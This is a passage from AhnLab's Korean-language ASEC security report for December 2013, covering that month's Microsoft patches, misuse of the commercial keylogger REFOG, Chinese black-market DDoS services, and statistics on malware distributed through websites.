ASEC REPORT 48 SECURITY TREND 18 보안동향 01. 보안통계 12월마이크로소프트보안업데이트현황 2013 년 12 월마이크로소프트사에서발표한보안업데이트는총 11 건으로긴급 5 건, 중요 6 건이다. 긴급업데이트에는인터넷익스플로러 (Internet Explorer) 누적보안업데이트가존재하며, 비공개적으 로보고된취약점 7 건을해결한다. 사용자들이인터넷에대한의존도가높아지면서인터넷익스플로 러의사용빈도는증가했고, 이에따라사용자들에게노출된취약점은큰위협이되고있다. 이런위 협을사전에차단하기위해선보안업데이트는필수다. 그림 2-1 공격대상기준별 MS 보안업데이트 긴급 MS13-096 마이크로소프트그래픽스컴포넌트의취약점으로인한원격코드실행문제점 MS13-097 인터넷익스플로러누적보안업데이트 MS13-098 윈도취약점으로인한원격코드실행문제점 MS13-099 마이크로소프트스크립팅런타임개체라이브러리취약점으로인한원격코드실행문제점 MS13-105 마이크로소프트익스체인지서버취약점으로인한원격코드실행문제점중요 MS13-100 마이크로소프트셰어포인트서버의취약점으로인한원격코드실행문제점 MS13-101 윈도커널모드드라이버의취약점으로인한권한상승문제점 MS13-102 LRPC 클라이언트의취약점으로인한권한상승문제점 MS13-103 ASP.NET SignalR의취약점으로인한권한상승문제점 MS13-104 마이크로소프트오피스의취약점으로인한정보유출문제점 MS13-106 마이크로소프트오피스공유구성요소의취약점으로인한보안기능우회표 2-1 2013년 12월주요 MS 보안업데이트

ASEC REPORT 48 SECURITY TREND 19 보안동향 02. 보안이슈 상용키로거의무분별한사용최근모대학교로스쿨법학전문대학원에서재학생이교수의 PC에해킹프로그램을설치하려다적발된사건이있었다. 이때사용된해킹프로그램은설치된 PC의정보를해커에게전달하거나원격으로제어할수있는기능을갖고있었다. 이기능은비단해킹프로그램뿐만아니라일반프로그램을통해서도가능한데, 일반인들도손쉽게구할수있는상용키로거 (Keylogger) 가그한예다. 상용키로거와같은프로그램은양날의칼과같이본래제작의도와는다르게사용자의목적에따라사이버범죄에악용되기도한다. [ 그림2-2] 는상용키로거인 REFOG 키로거라는프로그램이다. 홈페이지우측에있는사용자평을보면자녀의컴퓨터사용내역을확인할수있는탁월한제품이라고쓰여져있지만다르게생각하면타인의컴퓨터사용내역을확인할수있다는뜻이된다. 이러한툴의악용위험성을사전에알리고자상용키로거인 REFOG라는툴을사용하여페이스북계정정보를유출할수있다는경고성유투브동영상도공개된바있다. 중국인터넷블랙마켓, 사이버범죄서비스정찰제시행중국인터넷블랙마켓에는사이버범죄에사용되는각종서비스가넘쳐난다. 이러한서비스를이용하면비전문가나일반인들도사이버범죄를저지를수있다. 이중대표적인서비스는간단하면서도공격방식이효과적인 DDoS( 분산서비스거부공격 ) 다. DDoS 서비스를제공하는측은전세계적으로봇넷 (Botnet) 을구축하고관리한다. 따라서해당 DDoS를통해공격받으면해당서버관리자는공격의출발지가특정지역이아닌전세계적으로분포돼있기때문에대응이어렵다. DDoS공격이외에도안티바이러스우회서비스, 봇원격제어툴등을사용할수있는서비스를제공하는데이러한서비스들은모두유료이다. 또한제품의사용방식, 얻을수있는효과, 인프라의부가가치등에따라가격이세분화돼있다. 이와같이블랙마켓의가격체계가자리잡고난후블랙마켓으로유입되는범죄자들이늘어나고있고, 서비스의가격또한꾸준히인상되고있다. 그림 2-3 중국 DDoS 프로그램판매홈페이지 ( 출처 : http://sec.chinabyte.com) 그림 2-2 상용키로거 REFOG 의악용사례유튜브영상 이처럼일반프로그램을본래제작의도와는다르게사이버범죄에악용할수있는경우가늘어나고있다. 이러한프로그램은합법적으로판매되고있어제재가어렵다. 더큰 2차피해가발생하지않도록대책을마련해야한다.

ASEC REPORT 48 WEB SECURITY TREND 20 웹보안동향 01. 웹보안통계 웹사이트악성코드동향 안랩의웹브라우저보안서비스인사이트가드 (SiteGuard) 를활용한웹사이트보안통계자료에의하 면, 2013 년 12 월웹을통한악성코드발견건수는 2013 년 11 월 1290 건보다다소감소한 1161 건으 로나타났다. 하지만악성코드유형은총 106 종, 악성코드가발견된도메인은 125 개, 악성코드발견 URL 수는 228 건으로나타났다. 표 3-1 2013 년 12 월웹사이트보안현황 악성코드발견건수 1,290 12 월 11 월 1,161-10.0% 악성코드유형 106 101 악성코드가발견된도메인 125 71 악성코드가발견된 URL 228 154 월별악성코드배포 URL 차단건수 2013 년 12 월웹을통한악성코드발견건수는전월 1290 건의 90% 수준인 1161 건이다. 그림 3-1 월별웹을통한악성코드발견건수변화추이 10,000 5,000 0 4,228 5.3% 1,290 1,161 69.4% 10.0% 10 11 12

ASEC REPORT 48 WEB SECURITY TREND 21 월별악성코드유형 2013 년 12 월악성코드유형은전월 10 건의 105% 수준인 106 건이다. 그림 3-2 월별악성코드유형수변화추이 500 250 179 6.3% 101 106 43.6% 5.0% 0 10 11 12 월별악성코드가발견된도메인 2013 년 12 월악성코드가발견된도메인은전월의 71 건에비해 176% 증가한 125 건이다. 그림 3-3 악성코드가발견된도메인수변화추이 300 200 100 121 20.9% 71 41.3% 125 76.0% 0 10 11 12 월별악성코드가발견된 URL 2013 년 12 월악성코드가발견된 URL 은전달의 154 건에비해 148% 증가한수준인 228 건이다. 그림 3-4 월별악성코드가발견된 URL 수변화추이 1,000 750 500 250 432 7.3% 154 64.4% 228 48.0% 0 10 11 12

ASEC REPORT 48 WEB SECURITY TREND 22 월별악성코드유형 악성코드유형별배포수를보면트로이목마가 587 건 (50.6%) 으로절반을넘어섰고, 애드웨어는 185 건 (15.9%), 스파이웨어는 162 건 (14%) 로나타났다. 표 3-2 악성코드유형별배포수 유형 건수 비율 TROJAN 587 50.6 % ADWARE 185 15.9 % SPYWARE 162 14 % DROPPER 6 0.5 % Win32/VIRUT 3 0.3 % DOWNLOADER 2 0.2 % ETC 80 6.8 % 1,161 100.0 % 그림 3-5 악성코드유형별배포수 600 587 300 185 162 80 0 TROJAN ADWARE SPYWARE 6 3 2 DROPPER Win32/VIRUT DOWNLOADER ETC 악성코드최다배포수 악성코드배포최다 10 건중에서는 Trojan/Win32.Agent 가 163 건으로가장많았으며, Top10 에 Dropper/Win32.Dinwod 를포함해 4 건이새로나타났다. 표 3-3 악성코드배포최다 10건 순위 등락 악성코드명 건수 비율 1 Trojan/Win32.Agent 163 20 % 2 Spyware/Win32.Gajai 162 19.8 % 3 NEW Dropper/Win32.Dinwod 145 17.8% 4 NEW Trojan/Win32.Onescan 75 9.2% 5 1 Win-Trojan/Downloader.12800.LU 58 7.1% 6 1 Trojan/Win32.Starter 56 6.9% 7 NEW Adware/Win32.Adload 46 5.6% 8 1 Trojan/Win32.KorAd 43 5.3% 9 3 Adware/Win32.Clicker 37 4.5% 10 NEW Adware/Win32.Agent 31 3.85 TOTAL 889 100.0 %

ASEC REPORT CONTRIBUTORS 집필진 선임연구원 박종석 선임연구원 강동현 선임연구원 이도현 연구원 이영욱 연구원 강민철 참여연구원 ASEC 연구원 편집 안랩콘텐츠기획팀 디자인 안랩 UX 디자인팀 발행처 주식회사안랩경기도성남시분당구삼평동 673 ( 경기도성남시분당구판교역로 220) T. 031-722-8000 F. 031-722-8901 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다. 2013 AhnLab, Inc. All rights reserved.